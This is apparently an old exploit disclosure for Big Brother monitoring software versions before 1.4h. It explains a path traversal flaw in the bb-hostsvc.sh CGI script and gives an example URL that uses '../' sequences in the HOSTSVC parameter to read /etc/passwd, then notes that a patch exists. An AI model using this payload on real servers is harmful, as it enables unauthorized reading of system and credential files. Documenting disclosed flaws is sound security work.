/* Big Brother Exploit For ALL Versions prior to
 * v.1.4h
 *
 * Desc: View the contents of any file on the remote
 * system. Including /etc/passwd.
 *
 * Contributions: Identified and Proof of Concept by
 * Safety@Linuxmail.ORG and Loki [LoA]
 *
 * Greets and shouts to: #smile, #Vastervik, Self, alucard, #RootHat, Lammie (The Infamous
 * Lamagra! We know wuftpd was all about you bro!),
 * InVader (you're totally elite), lockdown
 * (stay elite man!), and Crimson (You're my hero!)
 * 
 *
 * Long Live The Empire of the Evil Cow People! MOO!
 */


 The problem exists in the code where $HOSTSVC does not do authenticity
 checking for its assigned variable.

 ---- snip ----
 # get the color of the status from the status file
 set `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` >/dev/null 2>&1 BKG="$1"
 ---- snap ----

 e.g. http://www.bb4.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd

 BB4 Technologies has already been notified and a patch is already out.
 It can be Downloaded from http://www.bb4.com/download.html

/* This exploit was found due to the mass intelligence and elite cow-people
*   ingenious of Safety and his esteemed apprentice cow Loki.
*/  MOO!
-- 
Get your free email from www.linuxmail.org